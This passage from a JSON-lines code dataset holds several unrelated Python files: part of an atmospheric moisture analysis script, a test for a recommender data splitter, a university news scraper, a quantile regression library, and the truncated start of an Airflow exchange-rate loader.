Moisture\r\n# # load MLS profile data\r\n# prof_file = '../MLS/MeanMLSProf-H2O-2016-07.pkl'\r\n# prof = pickle.load(gzip.open(prof_file,'r'))\r\n# # CORRECTIVE STEPS\r\n# # copy and correction of water vapour (as satratio was in kg/kg)\r\n# rvs=29/18*ended['rvs']\r\n# \"\"\" take care of the remaining parcels (temporary fix before removal from\r\n# convsrc3 processing)\r\n# About 3500 parcels are in this case with no info kept in ended.\r\n# Put them all at a single location.\r\n# This is not going to have a role as it represents 0,01%\"\"\"\r\n# jpnull=np.where(ended['p']==0)[0]\r\n# ended['p'][jpnull] = 10000.\r\n# ended['y'][jpnull] = 25.\r\n# # set rvs for the DEADBORNE parcels\r\n# j_db = np.where(ended['flag'] & I_DBORNE == I_DBORNE)[0]\r\n# y_end = ended['y'][j_db]\r\n# logp_end = np.log(ended['p'][j_db])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n# rvs[j_db] =np.minimum(rvs[j_db],prof['H2O'][idp,idy])\r\n# # 1) Plot of the raw distribution of moisture\r\n# num_blocs = int(len(ended['x'])/bloc_size)\r\n# rvs_r = np.mean(np.reshape(rvs,[num_blocs,bloc_size]),0)\r\n# chart(np.reshape(1.e6*rvs_r,[biny,binx]),txt='raw moisture')\r\n# # 2) contribution of hits to water vapour\r\n# j_hits = np.where(ended['flag'] & I_HIT)[0] % bloc_size\r\n# hh = np.maximum(np.histogram(j_hits,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0],1)\r\n# rvs_hits = rvs[ended['flag'] & I_HIT == I_HIT]\r\n# rvs_c = np.zeros(bloc_size)\r\n# for j in range(len(rvs_hits)):\r\n# rvs_c[j_hits[j]] += rvs_hits[j]\r\n# rvs_c = rvs_c/hh\r\n# chart(np.reshape(1.e6*rvs_c,[biny,binx]),txt=\"hit moisture\")\r\n\r\n# #%%\r\n# # 3) correction of non hits rvs with MLS values on the edge\r\n# prof_file = '../MLS/MeanMLSProf-H2O-2016-07.pkl'\r\n# prof = pickle.load(gzip.open(prof_file,'r'))\r\n# j_nohits = np.where(ended['flag'] & I_HIT ==0)[0]\r\n# y_end = ended['y'][j_nohits]\r\n# logp_end = np.log(ended['p'][j_nohits])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n#\r\n# rvs[j_nohits] =np.minimum(rvs[j_nohits],prof['H2O'][idp,idy])\r\n# rvs_t = np.mean(np.reshape(rvs,[num_blocs,bloc_size]),0)\r\n# chart(np.reshape(1.e6*rvs_t,[biny,binx]),txt='moisture v1')\r\n#\r\n# # 4) now set the rvs on hit at the mls value same alt and lat\r\n# j_hits=np.where(ended['flag'] & I_HIT == I_HIT)[0]\r\n# y_end = ended['y'][j_hits]\r\n# logp_end = np.log(ended['p'][j_hits])\r\n# idy = np.digitize(y_end,prof['LatEdges'])-1\r\n# idp = np.digitize(logp_end,prof['LogPressureEdges'])-1\r\n#\r\n# rvs[j_hits] =np.minimum(rvs[j_hits],prof['H2O'][idp,idy])\r\n# rvs_tt = np.sum(np.reshape(rvs,[num_blocs,bloc_size]),0)/num_blocs\r\n# chart(np.reshape(1.e6*rvs_tt,[biny,binx]),txt='moisture v2')\r\n\r\n# %%\r\ndef chart(field,txt=\"\",vmin=0,vmax=0,fgp=\"\"):\r\n \"\"\" Plots a 2d array field with colormap between min and max\"\"\"\r\n if(len(field.shape)>2):\r\n print(\"The field should be 2d\")\r\n return -1\r\n try:\r\n n1=plt.get_fignums()[-1]+1\r\n fig=plt.figure(plt.get_fignums()[-1]+1,figsize=[13,6])\r\n except:\r\n n1=1\r\n fig=plt.figure(n1+1,figsize=[13,6])\r\n m = Basemap(projection='cyl',llcrnrlat=domain[1,0],urcrnrlat=domain[1,1],\r\n llcrnrlon=domain[0,0],urcrnrlon=domain[0,1],resolution='c')\r\n m.drawcoastlines(color='w'); m.drawcountries(color='k')\r\n meridians = np.arange(-180.,180.,30.); parallels = np.arange(-50.,50.,20.)\r\n m.drawmeridians(meridians,labels=[0,0,0,1],fontsize=15)\r\n m.drawparallels(parallels,labels=[1,0,0,0],fontsize=15)\r\n if vmin==0:\r\n vmin=np.min(field)\r\n if vmax==0:\r\n vmax=np.max(field)\r\n bounds=np.arange(vmin,vmax*(1+0.0001),(vmax-vmin)/mymap.N)\r\n norm=colors.BoundaryNorm(bounds,mymap.N)\r\n iax=plt.imshow(field,interpolation='nearest',extent=domain.flatten(),\r\n clim=[vmin,vmax],origin='lower',cmap=mymap,norm=norm,aspect=1.)\r\n plt.title(txt,fontsize=18)\r\n #plt.xlabel('longitude')\r\n #plt.ylabel('latitude')\r\n cax = fig.add_axes([0.91, 0.26, 0.03, 0.5])\r\n cbar=fig.colorbar(iax,cax=cax)\r\n cbar.ax.tick_params(labelsize=18)\r\n #if len(fgp)>0:\r\n #plt.savefig('figs/chart-'+fgp+'.png') \r\n plt.show()\r\n\r\n# %%\r\nif __name__ == '__main__':\r\n main()","repo_name":"bernard-legras/STC","sub_path":"STC-back/analysNFULL.py","file_name":"analysNFULL.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"56"} +{"seq_id":"36031469974","text":"# pylint: disable-all\nfrom datetime import datetime\n\nimport pytest\nimport numpy as np\n\nfrom replay.splitters import ColdUserRandomSplitter\n\n\n@pytest.fixture\ndef log():\n import pandas as pd\n\n return pd.DataFrame(\n {\n \"user_idx\": list(range(5000)),\n \"item_idx\": list(range(5000)),\n \"relevance\": [1] * 5000,\n }\n )\n\n\ndef test(log):\n ratio = 0.25\n cold_user_splitter = ColdUserRandomSplitter(ratio)\n cold_user_splitter.seed = 27\n train, test = cold_user_splitter.split(log)\n test_users = test.toPandas().user_idx.unique()\n train_users = train.toPandas().user_idx.unique()\n assert not np.isin(test_users, train_users).any()\n real_ratio = len(test_users) / len(log)\n assert np.isclose(\n real_ratio, ratio, atol=0.01\n ) # Spark weights are random ¯\\_(ツ)_/¯\n","repo_name":"sb-ai-lab/RePlay","sub_path":"tests/splitters/test_cold_user_randrom_splitter.py","file_name":"test_cold_user_randrom_splitter.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"56"} +{"seq_id":"42568767149","text":"import urllib.request\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef resapce(word):\n return word.replace('\\n','').replace('\\r','').replace('\\t','').replace(' ','').replace('\\xa0','').replace(' ','')\ndef get_text(url1):\n headers = {\n 'Accept': 'text / html, application / xhtml + xml, application / xml;q = 0.9, image / webp, image / apng, * / *;q = 0.8',\n 'Accept - Encoding': 'gzip, deflate',\n 'Accept - Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Cache - Control': 'max - age = 0',\n 'Connection': 'keep - alive',\n 'Cookie': 'td_cookie=3615363546; JSESSIONID=291525C93525A077BFB1706F222B51D8',\n 'Host': 'lib.haust.edu.cn',\n 'Upgrade - Insecure - Requests': ' 1',\n 'User - Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36',\n }\n req = urllib.request.Request(url1, headers=headers)\n page = urllib.request.urlopen(req)\n html = page.read().decode('utf-8')\n soup1=BeautifulSoup(html)\n pattern = soup1.find_all('li','sconimg', 'a')\n for id in pattern:\n rel = r'href=\"(.*?)\"'\n ur = re.findall(rel, str(id), re.S)[0]\n print(ur)\n url2= 'http://lib.haust.edu.cn'+ ur\n print(url2)\n with open('henankejidaxue.txt','a+',encoding='utf-8') as f:\n f.write(url2+'\\n')\n req1 = urllib.request.Request(url2, headers=headers)\n page = urllib.request.urlopen(req1)\n html = page.read().decode('utf-8')\n soup2=BeautifulSoup(html)\n title=soup2.find_all('h1')\n for t1 in title:\n tit=resapce(t1.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write(tit + '\\n')\n time=soup2.find_all('div','list_cont_menu')\n for t2 in time:\n tim = resapce(t2.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write(tim + '\\n')\n content=soup2.find_all('div','list_cont_content')\n for c1 in content:\n con = resapce(c1.get_text())\n with open('henankejidaxue.txt', 'a+', encoding='utf-8') as f:\n f.write( con+ '\\n')\n\ndef main(id):\n url = 'http://lib.haust.edu.cn/haust/include/annmessage.jsp?id=104&pager.offset='+str(id)\n html = get_text(url)\nif __name__=='__main__':\n for i in range(0,60,10):\n main(i)","repo_name":"z1165419193/spark","sub_path":"datasearch/universitesnews/henankejidaxue/henankejidaxue.py","file_name":"henankejidaxue.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28482646768","text":"import numpy as np\r\nfrom quantregpy._fortran import rqbr, rqfnb, rqs, rqfnc, qfnb, pfnb\r\nfrom scipy.stats import norm\r\nfrom scipy.stats import t as studentT\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom copy import deepcopy\r\nimport pandas as pd\r\nimport collections\r\nfrom patsy import dmatrices, DesignMatrix\r\nimport logging\r\n\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nFit = collections.namedtuple(\r\n 'Fit', \r\n 'na_action formula terms x_design y_design call tau weights residuals rho method model coefficients fitted_values na_message Class')\r\n\r\ndef bandwidth_rq(p, n, hs = True, alpha = 0.05):\r\n \"\"\"\r\n Bandwidth selection for sparsity estimation two flavors:\r\n Hall and Sheather(1988, JRSS(B)) rate = O(n^{-1/3})\r\n Bofinger (1975, Aus. J. Stat) -- rate = O(n^{-1/5})\r\n Generally speaking, default method, hs=TRUE is preferred.\r\n \"\"\"\r\n x0 = norm.ppf(p)#qnorm(p)\r\n f0 = norm.pdf(x0)#dnorm(x0)\r\n if(hs):\r\n bandwidth = ( n**(-1./3.) * norm.ppf(1. - alpha/2.)**(2./3.) * ((1.5 * f0**2.)/(2. * x0**2. + 1.))**(1./3.) )\r\n else:\r\n bandwidth = n**-0.2 * ((4.5 * f0**4.)/(2. * x0**2. + 1.)**2.)**0.2\r\n return bandwidth\r\n\r\ndef print_rq(x : Fit, *args):\r\n print(\"Call:\")\r\n print(x.call)\r\n coef = x.coefficients\r\n print(\"\\nCoefficients:\\n\")\r\n print(coef, args)\r\n nobs = x.residuals.shape[0]\r\n p = coef.shape[1] if( len(coef.shape) > 1) else coef.shape[0]\r\n rdf = nobs - p\r\n print(f\"\\nDegrees of freedom:{nobs}total;{rdf}residual\\n\")\r\n print(f\"{x.na_message}\\n\")\r\n\r\ndef print_summary_rq(x, digits = 5, *args):\r\n print(\"\\nCall: \")\r\n print(x.call)\r\n coef = x.coef\r\n tau = x.tau\r\n print(\"\\ntau: \")\r\n print([round(t,digits) for t in tau.tolist()], args)\r\n print(\"\\nCoefficients:\\n\")\r\n print([round(c, digits) for c in coef.tolist()], args)\r\n\r\ndef failIfMissingData(df):\r\n if df.isnull().values.any():\r\n print(\"Missing data in data\")\r\n raise ValueError\r\n\r\ndef rq(formula : str, tau : np.array, data : pd.DataFrame, subset = None, weights = None,\r\n na_action = failIfMissingData,\r\n method = \"br\", model = True, contrasts = None, *args):\r\n tau = np.array([tau]) if type(tau) is float else tau\r\n expandedArgs = \", \".join(str(arg) for arg in args)\r\n baseCall = f\"rq(formula = {formula}, tau = {tau}, data = {data}, subset = {subset}, weights = {weights}, na_action = {na_action}, method = {method}, model = {model}, constrasts = {contrasts}\"\r\n call = baseCall + \", \" + expandedArgs\r\n mf = baseCall + f\", args = {args}\"\r\n m = \",\".join([param for param in mf.split(\",\") if param in (\"formula\", \"data\", \"subset\", \"weights\", \"na_action\")])\r\n Y, X = dmatrices(formula, data) # DesignMatrix\r\n mt = X.design_info.term_names # List[str]\r\n eps = np.finfo(float).eps**(2/3) # float\r\n Rho = lambda u, tau: u * (tau - (u < 0)) # Callable\r\n if(tau.shape[0]>1):\r\n if(np.any(tau < 0) or np.any(tau > 1)):\r\n logger.error(\"invalid tau: taus should be >= 0 and <= 1\")\r\n raise ValueError\r\n tau[tau == 0] = eps\r\n tau[tau == 1] = 1 - eps\r\n coef = np.zeros((X.shape[1],tau.shape[0]))\r\n rho = np.zeros(tau.shape[0])\r\n fitted = np.zeros((X.shape[0], tau.shape[0]))\r\n resid = np.zeros((X.shape[0], tau.shape[0]))\r\n for i in range(tau.shape[0]):\r\n z = rq_wfit(X, Y, tau[i], weights, method, *args) if not (weights is None) else rq_fit(X, Y, tau[i], method, *args)\r\n coef[:,i] = z['coefficients']\r\n resid[:,i] = z['residuals']\r\n rho[i] = np.sum(Rho(z['residuals'],tau[i]))\r\n fitted[:,i] = Y - z['residuals']\r\n taulabs = f\"tau={np.around(tau,3)}\"\r\n fit = dict()\r\n fit['coefficients'] = coef\r\n fit['residuals'] = resid\r\n fit['fitted_values'] = fitted\r\n if(method == \"lasso\"): \r\n fit['Class'] = (\"lassorqs\",\"rqs\")\r\n elif(method == \"scad\"):\r\n fit['Class'] = (\"scadrqs\",\"rqs\")\r\n else:\r\n fit['Class'] = \"rqs\"\r\n else:\r\n process = (tau < 0) or (tau > 1)\r\n if(tau == 0):\r\n tau = eps\r\n if(tau == 1):\r\n tau = 1 - eps\r\n fit = rq_wfit(X, Y, tau, weights, method, *args) if not (weights is None) else rq_fit(X, Y, tau, method, *args) \r\n if(process):\r\n rho = [fit['sol'][1,:],fit['sol'][3,:]]\r\n else:\r\n rho = np.sum(Rho(fit['residuals'],tau)) # np.ndarray\r\n if(method == \"lasso\"):\r\n fit['Class'] = (\"lassorq\",\"rq\")\r\n elif(method == \"scad\"):\r\n fit['Class'] = (\"scadrq\",\"rq\")\r\n else:\r\n fit['Class'] = \"rq.process\" if process else \"rq\"\r\n fit['na_action'] = na_action # Callable\r\n fit['formula'] = formula # str\r\n fit['terms'] = mt # List[str]\r\n fit['x_design'] = X.design_info # DesignInfo\r\n fit['y_design'] = Y.design_info # DesignInfo\r\n fit['call'] = call # str\r\n fit['tau'] = tau # np.ndarray\r\n fit['weights'] = weights # Union[None, np.ndarray]\r\n fit['rho'] = rho # np.ndarray\r\n fit['method'] = method # str\r\n if(model):\r\n fit['model'] = mf # str\r\n return fit\r\n\r\ndef rq_fit(x : np.array, y : np.array, tau = 0.5, method = \"br\", *args):\r\n if (method == \"fn\"): \r\n fit = rq_fit_fnb(x, y, tau, *args)\r\n elif (method == \"fnb\"):\r\n fit = rq_fit_fnb(x, y, tau, *args)\r\n elif (method == \"fnc\"):\r\n fit = rq_fit_fnc(x, y, tau, *args)\r\n elif (method == \"pfnb\"):\r\n \tfit = rq_fit_pfnb(x, y, tau, *args)\r\n elif (method == \"br\"):\r\n fit = rq_fit_br(x, y, tau, *args)\r\n #elif (method == \"lasso\"):\r\n #\tfit = rq_fit_lasso(x, y, tau, *args)\r\n #elif (method == \"scad\"):\r\n #\tfit = rq_fit_scad(x, y, tau = tau, *args)\r\n else:\r\n raise ValueError(f\"rq.fit.{method} not yet implemented\")\r\n\r\n fit['fitted_values'] = y - fit['residuals']\r\n return fit\r\n\r\ndef dropNpColumn(npmat, j):\r\n if j == 0:\r\n return npmat[:,1:]\r\n elif j == npmat.shape[1] - 1:\r\n return npmat[:,:j]\r\n else:\r\n return np.concatenate((npmat[:,:j],npmat[:,:j+1]), axis=1)\r\n\r\ndef rq_wfit(x, y, tau, weights, method = \"br\", *args):\r\n if(any(weights < 0)):\r\n raise ValueError(\"negative weights not allowed\")\r\n if len(weights.shape) != 2:\r\n weights = weights.reshape((weights.shape[0],1))\r\n wx = x * weights \r\n wy = y * weights.flatten()\r\n\r\n if (method == \"fn\"): \r\n fit = rq_fit_fnb(wx, wy, tau, *args)\r\n elif (method == \"fnb\"):\r\n fit = rq_fit_fnb(wx, wy, tau, *args)\r\n elif (method == \"fnc\"):\r\n fit = rq_fit_fnc(wx, wy, tau, *args)\r\n #elif (method == \"pfn\"):\r\n # fit = rq_fit_pfn(x, y, tau, *args)\r\n if (method == \"br\"):\r\n fit = rq_fit_br(wx, wy, tau, *args)\r\n else:\r\n print(f\"rq.fit.{method} not yet implemented\")\r\n raise ValueError\r\n if(len(fit.get('sol',[])) > 0):\r\n fit['fitted_values'] = np.matmul( x , fit['sol'][3:,:])\r\n else:\r\n yhat = np.matmul( x , fit['coefficients'])\r\n ny = 1 if len(y.shape) == 1 else y.shape[1]\r\n fit['fitted_values'] = yhat.reshape((yhat.shape[0], ny))\r\n fit['residuals'] = y - fit[\"fitted_values\"]\r\n fit['weights'] = weights\r\n return fit\r\n\r\ndef rq_fit_br(x, y, tau = 0.5, alpha = 0.1, ci = False, iid = True,\r\n interp = True, tcrit = True):\r\n \"\"\"\r\n Function to compute regression quantiles using original simplex approach\r\n of Barrodale-Roberts/Koenker-d'Orey. There are several options.\r\n The options are somewhat different than those available for the Frisch-\r\n Newton version of the algorithm, reflecting the different natures of the\r\n problems typically solved. Succintly BR for \"small\" problems, FN for\r\n \"large\" ones. Obviously, these terms are conditioned by available hardware.\r\n\r\n Basically there are two modes of use:\r\n 1. For Single Quantiles:\r\n \r\n if tau is between 0 and 1 then only one quantile solution is computed.\r\n \r\n if ci = FALSE then just the point estimate and residuals are returned\r\n \t\tIf the column dimension of x is 1 then ci is set to FALSE since\r\n \t\tsince the rank inversion method has no proper null model.\r\n if ci = TRUE then there are two options for confidence intervals:\r\n \r\n 1. if iid = TRUE we get the original version of the rank\r\n inversion intervals as in Koenker (1994)\r\n 2. if iid = FALSE we get the new version of the rank inversion\r\n intervals which accounts for heterogeneity across\r\n observations in the conditional density of the response.\r\n The theory of this is described in Koenker-Machado(1999)\r\n Both approaches involve solving a parametric linear programming\r\n problem, the difference is only in the factor qn which\r\n determines how far the PP goes. In either case one can\r\n specify two other options:\r\n 1. interp = FALSE returns two intervals an upper and a\r\n lower corresponding to a level slightly\r\n above and slightly below the one specified\r\n by the parameter alpha and dictated by the\r\n essential discreteness in the test statistic.\r\n \t\t\t\tinterp = TRUE returns a single interval based on\r\n linear interpolation of the two intervals\r\n returned: c.values and p.values which give\r\n the critical values and p.values of the\r\n upper and lower intervals. Default: interp = TRUE.\r\n 2. tcrit = TRUE uses Student t critical values while\r\n tcrit = FALSE uses normal theory ones.\r\n 2. For Multiple Quantiles:\r\n \r\n if tau < 0 or tau >1 then it is presumed that the user wants to find\r\n all of the rq solutions in tau, and the program computes the whole\r\n \tquantile regression solution as a process in tau, the resulting arrays\r\n \tcontaining the primal and dual solutions, betahat(tau), ahat(tau)\r\n are called sol and dsol. These arrays aren't printed by the default\r\n print function but they are available as attributes.\r\n It should be emphasized that this form of the solution can be\r\n \tboth memory and cpu quite intensive. On typical machines it is\r\n \tnot recommended for problems with n > 10,000.\r\n \tIn large problems a grid of solutions is probably sufficient.\r\n \"\"\"\r\n tol = np.finfo(float).eps**(2/3)\r\n eps = tol\r\n big = np.finfo(float).max**(2/3)\r\n p = x.shape[1]\r\n n = x.shape[0]\r\n nsol = 2\r\n ndsol = 2\r\n # Check for Singularity of X since br fortran isn't very reliable about this\r\n #storage.mode(y) <- \"double\"\r\n if (np.linalg.matrix_rank(x) < p):\r\n raise ValueError(\"Singular design matrix\")\r\n if (tau < 0) or (tau > 1):\r\n nsol = 3 * n\r\n ndsol = 3 * n\r\n lci1 = False\r\n qn = np.array([0] * p)\r\n cutoff = 0\r\n tau = -1\r\n else:\r\n if (p == 1):\r\n ci = False\r\n if (ci):\r\n lci1 = True\r\n if (tcrit):\r\n cutoff = studentT.ppf(1 - alpha/2, n - p)\r\n else: \r\n cutoff = norm.ppf(1 - alpha/2.)\r\n if (not iid):\r\n h = bandwidth_rq(tau, n, hs = True)\r\n bhi = rq_fit_br(x, y, tau + h, ci = False)\r\n bhi = bhi['coefficients']\r\n blo = rq_fit_br(x, y, tau - h, ci = False)\r\n blo = blo['coefficients']\r\n dyhat = np.matmul(x, (bhi - blo))\r\n if (np.any(dyhat <= 0)):\r\n pfis = (100 * np.sum(dyhat <= 0))/n\r\n print(f\"{pfis}percent fis <=0\")\r\n f = np.maximum(eps, (2 * h)/(dyhat - eps))\r\n qn = np.array([0]*p)\r\n for j in range(p):\r\n tempX = dropNpColumn(x, j)\r\n tempY = x[:,j]\r\n lr = LinearRegression().fit(tempX, tempY, sample_weight=f)\r\n qnj = lr.predict(tempX) - tempY\r\n qn[j] <- np.sum(qnj * qnj)\r\n else:\r\n qn = 1./np.diagonal(np.linalg.inv(np.matmul(x.T,x)))\r\n else:\r\n lci1 = False\r\n qn = np.array([0]*p)\r\n cutoff = 0\r\n sFor,waFor,wbFor,nsolFor,ndsFor= np.zeros([n]), np.zeros([(n + 5), (p + 4)]), np.zeros(n), nsol,ndsol\r\n tnmat = np.zeros([4,p])\r\n flag,coef,resid,sol,dsol,lsol, h, qn, cutoff, ci, tnmat = rqbr(p+3,x,y,tau,tol,sFor,waFor,wbFor,nsolFor,ndsFor,tnmat, big, lci1)\r\n if (flag != 0):\r\n if flag == 1:\r\n print(\"Solution may be nonunique\")\r\n else:\r\n print(\"Premature end - possible conditioning problem in x\")\r\n if (tau < 0) or (tau > 1):\r\n sol = sol[1:((p + 3) * lsol)]\r\n dsol = dsol[1:(n * lsol)]\r\n return({\"sol\" : sol, \"dsol\" : dsol})\r\n if (not np.any(ci)):\r\n dual = dsol.T.flatten()[0:n]\r\n yhatCols = 1 if len(coef.shape) < 2 else coef.shape[1]\r\n yhat = np.matmul(x, coef).reshape((x.shape[0], yhatCols))\r\n return(dict(coefficients = coef, x = x, y = y, residuals = y - yhat.flatten(), dual = dual))\r\n if (interp):\r\n Tn = tnmat\r\n Tci = ci\r\n Tci[3, :] = Tci[3, :] + (np.abs(Tci[4, :] - Tci[3, :]) * (cutoff -\r\n np.abs(Tn[3, :])))/np.abs(Tn[4,: ] - Tn[3, :])\r\n Tci[2, :] = Tci[2, :] - (np.abs(Tci[1,: ] - Tci[2, :]) * (cutoff -\r\n np.abs(Tn[2, :])))/np.abs(Tn[1, :] - Tn[2, :])\r\n Tci[2, np.isnan(Tci[2,:]) ] = -big\r\n Tci[3, np.isnan(Tci[3,:]) ] = big\r\n coefficients = np.concatinate((coef,Tci[2:4, : ].T), axis = 1)\r\n residuals = y - np.matmul(x, coef)\r\n return(dict(coefficients = coefficients, residuals = residuals))\r\n else:\r\n Tci = ci\r\n coefficients = np.concatenate([coef, Tci.T], axis=1)\r\n residuals = y - np.matmul(x , coef)\r\n c_values = tnmat.T\r\n c_values = np.fliplr(c_values) \r\n p_values = studentT.cdf(c_values, n - p) if (tcrit) else norm.cdf(c_values)\r\n return dict(coefficients = coefficients, residuals = residuals,\r\n c_values = c_values, p_values = p_values)\r\n\r\ndef rq_fit_fnb (x, y, tau = 0.5, beta = 0.99995, eps = 1e-06):\r\n n = y.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n if(n != x.shape[0]):\r\n raise ValueError(\"x and y don't match n\")\r\n if (tau < eps) or (tau > 1 - eps):\r\n raise ValueError(\"No parametric Frisch-Newton method. Set tau in (0,1)\")\r\n rhs = (1 - tau) * np.sum(x, axis = 0)\r\n d = np.ones(n)\r\n u = np.ones(n)\r\n wn = np.zeros((n,9))\r\n wn[0:n,0] = (1-tau) #initial value of dual solution\r\n a = x.T\r\n wp, nit, info = rqfnb(a,-y,rhs,d,u,beta,eps,wn)\r\n if (info != 0):\r\n raise ValueError(f\"Error info = {info} in stepy: singular design\")\r\n coefficients = -wp[:,0].reshape((p,1))\r\n residuals = y - np.matmul(x,coefficients).flatten()\r\n return dict(coefficients=coefficients.flatten(), tau=tau, residuals=residuals)\r\n\r\ndef rq_fit_fnc(x, y, R, r, tau = 0.5, beta = 0.9995, eps = 1e-06):\r\n n1 = y.shape[0]\r\n n2 = r.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n if (n1 != x.shape[0]):\r\n raise ValueError(\"x and y don't match n1\")\r\n if (n2 != R.shape[0]):\r\n raise ValueError(\"R and r don't match n2\")\r\n if (p != ( 1 if len(R.shape) == 1 else R.shape[1] ) ):\r\n raise ValueError(\"R and x don't match p\")\r\n if (tau < eps) or (tau > 1 - eps):\r\n raise ValueError(\"No parametric Frisch-Newton method. Set tau in (0,1)\")\r\n rhs = (1 - tau) * np.sum(x, axis = 0)\r\n u = np.ones(max(n1,n2)) #upper bound vector and scratch vector\r\n wn1 = np.zeros((n1, 9) )\r\n wn1[0:n1] = (1 - tau) #store the values of x1\r\n wn2 = np.zeros(( n2, 6))\r\n wn2[0:n2] = 1 #store the values of x2\r\n _, _, wp, nit, info = rqfnc( x.T, -y, R.T, -r, rhs, u, beta, eps, wn1, wn2)\r\n if (info != 0):\r\n raise ValueError(f\"Error info = {info} in stepy: singular design\")\r\n coefficients = -wp[0:p,0]\r\n residuals = y - np.matmul(x,coefficients).flatten()\r\n it_count = nit\r\n return dict(coefficients=coefficients, tau=tau, residuals=residuals)\r\n\r\ndef rqs_fit(x, y, tau = 0.5, tol = 0.0001):\r\n \"\"\" \r\n function to compute rq fits for multiple y's\r\n \"\"\"\r\n p = x.shape[1]\r\n n = x.shape[0]\r\n m = y.shape[1]\r\n\r\n flag, coef, e = rqs(\r\n x,\r\n y,\r\n tau,\r\n tol,\r\n np.zeros([n]),\r\n np.zeros([(n + 5) , (p + 2)]),\r\n np.zeros(n))\r\n if(np.sum(flag)>0):\r\n if(np.any(flag==2)):\r\n print(f\"{np.sum(flag==2)} out of {m} BS replications have near singular design\")\r\n if(np.any(flag==1)):\r\n print(f\"{np.sum(flag==1)} out of {m} may be nonunique\")\r\n \r\n return(coef.T)\r\n\r\n# R function for fnb call for multiple taus\r\ndef rq_fit_qfnb(x,y,tau):\r\n n = x.shape[0]\r\n p = 1 if len(x.shape) == 1 else x.shape[1]\r\n m = len(tau)\r\n d = np.ones((1, n))\r\n u = np.ones((1, n))\r\n _, _, _, b, nit, info = qfnb(x.transpose(), -y, tau, d, u)\r\n if(info != 0):\r\n logger.warning(f\"Info = {info} in stepy: singular design: nit = {nit[0]}\")\r\n coefficients = -np.reshape(b, (p, m))\r\n return dict(coefficients = coefficients, nit = nit, flag = info)\r\n\r\ndef rq_fit_pfnb (x, y, tau = np.array([0.5]), m0 = None, eps = 1e-06):\r\n tau = np.array([tau]) if type(tau) is float else tau\r\n m = len(tau)\r\n n = len(y)\r\n if (x.shape[0] != n):\r\n ValueError(\"x and y don't match n\")\r\n p = x.shape[1]\r\n if(m0 is None):\r\n m0 = int( (n**(2./3.)) * ((p ** 0.5)) ) # Needs testing!\r\n s = np.random.choice(n,m0)\r\n xs = x[s,:]\r\n ys = y[s]\r\n z = rq_fit(xs, ys, tau = tau[0], method = \"fn\")\r\n r = y - np.matmul( x , z['coefficients'] ).flatten()\r\n b = np.zeros((p,m))\r\n nit = np.zeros((5,m))\r\n xxinv = np.linalg.inv((np.linalg.cholesky((np.matmul(xs.T,xs)))))\r\n band = np.maximum(eps, np.sqrt(np.matmul(np.matmul(x , xxinv)**2 , np.ones(p) ) ) )\r\n r, b, d, u, wn, wp, aa, yy, slo, shi, rhs, glob, ghib, nit, info = pfnb (\r\n x.T,\r\n y,\r\n tau,\r\n r,\r\n -b,\r\n band,\r\n m0)\r\n coefficients = np.reshape(-b,(p,m))\r\n nit = np.reshape(nit,(5,m))\r\n return dict(coefficients = coefficients, nit = nit, flag = info)\r\n","repo_name":"quantregpy/quantregpy","sub_path":"quantregpy/quantreg.py","file_name":"quantreg.py","file_ext":"py","file_size_in_byte":17734,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"56"} +{"seq_id":"70924098736","text":"from airflow import AirflowException\nfrom datetime import datetime, timedelta\nfrom exchangerate.api_utils import request_date_range\nfrom exchangerate.orm_utils import put_rates_to_stage, get_max_dates\n\n\ndef check_state(db_conf, pairs):\n pairs_to_load_recent = {}\n pairs_to_load_history = pairs.copy()\n\n for row in get_max_dates(db_conf):\n if row.pair in pairs:\n pairs_to_load_recent[row.pair] = row.max_date\n pairs_to_load_history.remove(row.pair)\n\n return pairs_to_load_recent, pairs_to_load_history\n\n\ndef split_date_range(start, end, max_days=365):\n days = (end - start).days\n while days > max_days:\n yield start, start + timedelta(days=max_days)\n start = start + timedelta(days=max_days)\n days = (end - start).days\n yield start, end\n\n\ndef group_recent_pairs_by_bases(pairs_to_load_recent):\n pairs_by_bases = {}\n for pair, date in pairs_to_load_recent.items():\n base = pair.split('/')[1]\n pairs_by_bases.setdefault(base, {}).update({pair: date})\n\n return pairs_by_bases\n\n\ndef group_history_pairs_by_bases(pairs_to_load_history):\n history_pairs_by_bases = {}\n for pair in pairs_to_load_history:\n base = pair.split('/')[1]\n history_pairs_by_bases.setdefault(base, []).append(pair)\n\n return history_pairs_by_bases\n\n\ndef load_recent_pairs(db_conf, pairs_to_load_recent):\n recent_pairs_by_bases = group_recent_pairs_by_bases(pairs_to_load_recent)\n today_utc = datetime.utcnow().date()\n for base, pairs in recent_pairs_by_bases.items():\n symbols_to_search = [key.split('/')[0] for key in pairs.keys()]\n symbols_str = ','.join(symbols_to_search)\n\n earliest_date = min(pairs.values())\n for start_date, end_date in split_date_range(earliest_date, today_utc):\n resp = request_date_range(start_date,\n end_date,\n base,\n symbols_str)\n if not resp:\n raise AirflowException('Exchange API has not returned data')\n put_rates_to_stage(db_conf, resp, base, symbols_to_search)\n\n\ndef load_history_pairs(db_conf, pairs_to_load_history):\n history_pairs_by_bases = group_history_pairs_by_bases(pairs_to_load_history)\n today_utc = datetime.utcnow().date()\n for base, pairs in history_pairs_by_bases.items():\n 